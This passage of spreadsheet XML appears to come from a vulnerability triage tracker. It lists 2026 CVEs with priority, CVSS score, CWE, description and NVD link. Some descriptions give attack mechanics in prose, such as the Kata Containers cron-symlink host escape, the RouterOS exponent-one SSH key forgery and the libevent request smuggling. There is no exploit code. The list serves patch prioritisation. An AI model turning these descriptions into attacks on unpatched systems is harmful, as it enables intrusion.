      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L553" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the CustomizeUser plugin where the field_name parameter is stored raw without sanitization. Administrators can inject malicious scripts via the add.json.php endpoint that execute when viewing extra info pages or profile forms that render the typeToHTML function.</t>
        </is>
      </c>
      <c r="M553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89254</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89255</t>
        </is>
      </c>
      <c r="C554" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D554" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E554" s="5" t="inlineStr"/>
      <c r="F554" s="5" t="inlineStr"/>
      <c r="G554" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L554" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to HTML-encode PGP public keys echoed into a textarea element. An authenticated attacker can inject malicious JavaScript by submitting a crafted public key, which executes in an administrator's session when viewing the user's profile tab.</t>
        </is>
      </c>
      <c r="M554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89255</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89256</t>
        </is>
      </c>
      <c r="C555" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D555" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E555" s="5" t="inlineStr"/>
      <c r="F555" s="5" t="inlineStr"/>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L555" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the Bookmark plugin where chapter names are not encoded before being concatenated into public watch-page HTML. A video owner can inject malicious scripts via the bookmark name parameter, and every visitor of that video executes the payload in the AVideo origin.</t>
        </is>
      </c>
      <c r="M555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89256</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89258</t>
        </is>
      </c>
      <c r="C556" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D556" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E556" s="5" t="inlineStr"/>
      <c r="F556" s="5" t="inlineStr"/>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L556" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. In versions after v0.123.0 and before v0.165.0, symlinks in parent directories were not dropped during direct resource lookups, allowing path confinement to be bypassed. An attacker who can place — or who convinces a site author to place — a symlink inside a mounted directory (for example, in a locally vendored theme under themes/) can cause functions that perform direct lookups, such as resources.Get and os.ReadFile, to follow that symlink and read files outside the intended project boundaries, disclosing their contents in the built site. Themes mounted as Go modules fetched from GitHub have symlinks stripped on download and are not affected, and multi-directory walks (e.g. content/asset walking) are not affected. This issue is an incomplete-fix follow-up to GHSA-c3wq-j5vh-68rc and GHSA-fw87-fv5r-9fpw; it is fixed in v0.165.0.</t>
        </is>
      </c>
      <c r="M556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89258</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89259</t>
        </is>
      </c>
      <c r="C557" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D557" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L557" s="5" t="inlineStr">
        <is>
          <t>Hugo is a static site generator. From v0.161.0, Hugo executes Node tools under Node's permission model, but TailwindCSS — included in the default security.exec.allow list — requires a highly permissive configuration (--allow-addons, --allow-child-process, --allow-worker). As a result, the restrictions intended by the fix for GHSA-x597-9fr4-5857 could still be bypassed, allowing a Node tool invoked during a build to read and write files outside the project's working directory. Affected versions are those after v0.43; the issue was fixed in v0.165.0 by removing tailwindcss from the default security.exec.allow list. Users who do not use TailwindCSS, or who only build trusted sites, are not affected. As a workaround, users can define a restrictive security.exec.allow list in hugo.toml.</t>
        </is>
      </c>
      <c r="M557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89259</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13737</t>
        </is>
      </c>
      <c r="C558" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D558" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E558" s="5" t="inlineStr"/>
      <c r="F558" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="I558" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L558" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an allowlist bypass vulnerability affecting command execution authorization.  Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="M558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13737</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13745</t>
        </is>
      </c>
      <c r="C559" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D559" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E559" s="5" t="inlineStr"/>
      <c r="F559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L559" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Gemini CLI and associated GitHub Action allowed an unprivileged attacker to achieve an arbitrary code execution in Gemini CLI via untrusted local .env files overriding GEMINI_CLI_HOME.</t>
        </is>
      </c>
      <c r="M559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13745</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21095</t>
        </is>
      </c>
      <c r="C560" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D560" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L560" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in DNG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21095</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21096</t>
        </is>
      </c>
      <c r="C561" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D561" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in JPEG decoder of libimagecodec.quram.so prior to SMR Sep-2026 Release 1 allows remote attackers to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21096</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39923</t>
        </is>
      </c>
      <c r="C562" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D562" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr">
        <is>
          <t>CWE-324</t>
        </is>
      </c>
      <c r="L562" s="5" t="inlineStr">
        <is>
          <t>Flarum before 1.8.16 contains a password reset token expiry bypass vulnerability that allows unauthenticated attackers to reuse expired password reset tokens by submitting them directly to the reset processing endpoint. The SavePasswordController::handle() method calls PasswordToken::findOrFail() without performing any expiry validation, allowing attackers to bypass the 24-hour token lifetime enforced only during form rendering and change any account's password to gain an authenticated session.</t>
        </is>
      </c>
      <c r="M562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39923</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42945</t>
        </is>
      </c>
      <c r="C563" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D563" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E563" s="5" t="inlineStr"/>
      <c r="F563" s="5" t="n">
        <v>0.68</v>
      </c>
      <c r="G563" s="5" t="inlineStr">
        <is>
          <t>f5, nginx</t>
        </is>
      </c>
      <c r="H563" s="5" t="inlineStr">
        <is>
          <t>f5:dos, f5:nginx_gateway_fabric, f5:nginx_ingress_controller, f5:nginx_instance_manager, f5:nginx_open_source, f5:nginx_plus, f5:waf</t>
        </is>
      </c>
      <c r="I563" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-131</t>
        </is>
      </c>
      <c r="L563" s="5" t="inlineStr">
        <is>
          <t>NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, attackers can execute code on systems with Address Space Layout Randomization (ASLR) disabled or when the attacker can bypass ASLR.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.</t>
        </is>
      </c>
      <c r="M563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42945</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46713</t>
        </is>
      </c>
      <c r="C564" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D564" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E564" s="5" t="inlineStr"/>
      <c r="F564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L564" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. Versions 12.37.0 and later, but prior to 2026.5.4, contain a vulnerability in the JSON-LD signature validation and compaction process that allows spoofed activities to be accepted as valid. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46713</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47243</t>
        </is>
      </c>
      <c r="C565" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D565" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-36</t>
        </is>
      </c>
      <c r="L565" s="5" t="inlineStr">
        <is>
          <t>Kata Containers is an open source project focusing on a standard implementation of lightweight Virtual Machines (VMs) that perform like containers. Prior to 3.31.0, the runtime-rs standalone virtio-fs path is vulnerable to a guest-root to host-root escape. In this configuration, Kata runs the host virtiofsd as root with --sandbox none --seccomp none, so an attacker with root-equivalent access inside the guest can bypass the guest virtio-fs client entirely by taking over the virtio-fs PCI device and building a virtqueue in userspace to submit raw FUSE requests directly to the host virtiofsd. A crafted FUSE_SYMLINK request whose new symlink name is an absolute host path is honored outside the configured shared directory, allowing guest root to create root-owned symlinks in sensitive host locations such as /etc/cron.d. By pointing such a symlink at a guest-controlled crontab payload reachable through a live runtime process's mount namespace, the attacker causes the host cron daemon to execute that payload as host root, crossing the Kata isolation boundary. This issue is fixed in version 3.31.0.</t>
        </is>
      </c>
      <c r="M565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47243</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47839</t>
        </is>
      </c>
      <c r="C566" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D566" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allows users authenticating through a federated OIDC provider to obtain the uaa.admin scope despite operators restricting that provider through externalGroupsWhitelist configuration. The issue occurs specifically when an OIDC identity provider uses groupMappingMode: AS_SCOPES with a wildcard externalGroupsWhitelist entry.</t>
        </is>
      </c>
      <c r="M566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47839</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53790</t>
        </is>
      </c>
      <c r="C567" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D567" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="L567" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains multiple command and argument injection vulnerabilities that allow attackers to execute arbitrary commands by supplying malicious input through several code paths, including the RSYNC_CONNECT_PROG environment variable, daemon hooks, the rsync-ssl wrapper, and remote-shell command newline injection. Attackers can inject shell metacharacters or newline characters into unsanitized user-supplied values such as hostnames and hostspecs to execute arbitrary commands under the privileges of the rsync process or the invoking user.</t>
        </is>
      </c>
      <c r="M567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53790</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59679</t>
        </is>
      </c>
      <c r="C568" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D568" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L568" s="5" t="inlineStr">
        <is>
          <t>fs_read_glyphs() in the libXfont2 font-server client (src/fc/fserve.c) indexes the per-character encoding[] array using num_chars from the FS_QueryXBitmaps16 reply, but that array was allocated with a size derived from num_extents in the separate FS_QueryXExtents16 reply. The two CARD32 fields are never cross-checked.
A malicious or compromised font server can send a small num_extents (e.g. 1) in the extents reply, then a large num_chars (e.g. 100000) in the bitmaps reply. This causes attacker-controlled out-of-bounds heap read and writes.</t>
        </is>
      </c>
      <c r="M568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59679</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63382</t>
        </is>
      </c>
      <c r="C569" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D569" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L569" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, the libevent evhttp parser in http.c inconsistently handles duplicate Transfer-Encoding headers, comma-separated Transfer-Encoding values, and bare line feeds in chunked framing. evhttp_find_header can select only the first header, evhttp_check_transfer_encoding_ was absent so the previous whole-string comparison fails to recognize valid lists ending in chunked, and evhttp_handle_chunked_read uses EVBUFFER_EOL_CRLF rather than EVBUFFER_EOL_CRLF_STRICT, accepting bare LF chunk terminators. When libevent is deployed behind a proxy that frames the same request differently, an unauthenticated remote attacker can desynchronize request boundaries and smuggle a second request, potentially bypassing access controls or poisoning caches. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63382</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63385</t>
        </is>
      </c>
      <c r="C570" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D570" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L570" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has two HTTP parsing weaknesses in http.c. evhttp_decode_uri_internal decodes percent-encoded %00 bytes into literal NUL characters, which can cause downstream C string operations to truncate a path and bypass validation performed on a different representation. evhttp_header_is_valid_value also accepts obsolete line folding in header values containing carriage return or line feed characters, allowing a proxy and libevent to interpret headers differently and enabling header injection or access control bypass. The CRLF header acceptance is fixed in versions 2.1.13 and 2.2.2-alpha, but the reviewed patches do not clearly remediate the URI NUL-truncation condition.</t>
        </is>
      </c>
      <c r="M570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63385</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65638</t>
        </is>
      </c>
      <c r="C571" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D571" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L571" s="5" t="inlineStr">
        <is>
          <t>Improper escaping of a request URL in  ConfigServer Security &amp; Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection.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M571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65638</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66047</t>
        </is>
      </c>
      <c r="C572" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D572" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-330</t>
        </is>
      </c>
      <c r="L572" s="5" t="inlineStr">
        <is>
          <t>ProfilePress (wp-user-avatar) WordPress plugin before 4.17.2 contains an unauthenticated remote code execution vulnerability that allows unauthenticated attackers to install and activate arbitrary plugins by brute-forcing a weak 32-bit connect token via the ppress_connect_process AJAX handler. Attackers can supply a caller-controlled URL through the file request parameter to trigger silent plugin installation and activation, achieving PHP code execution as the web-server user.</t>
        </is>
      </c>
      <c r="M572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66047</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67276</t>
        </is>
      </c>
      <c r="C573" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D573" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L573" s="5" t="inlineStr">
        <is>
          <t>RouterOS does not compare the complete RSA public key when matching an SSH authentication request to an authorized user key, checking the key type and modulus but omitting the exponent. Because signature verification uses the client-supplied key, an attacker knowing an authorized RSA modulus can supply a key with exponent one, forge a valid signature, and open an SSH command channel as the target user without the private key.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67276</t>
        </is>
      </c>
    </row>
    <row r="574">
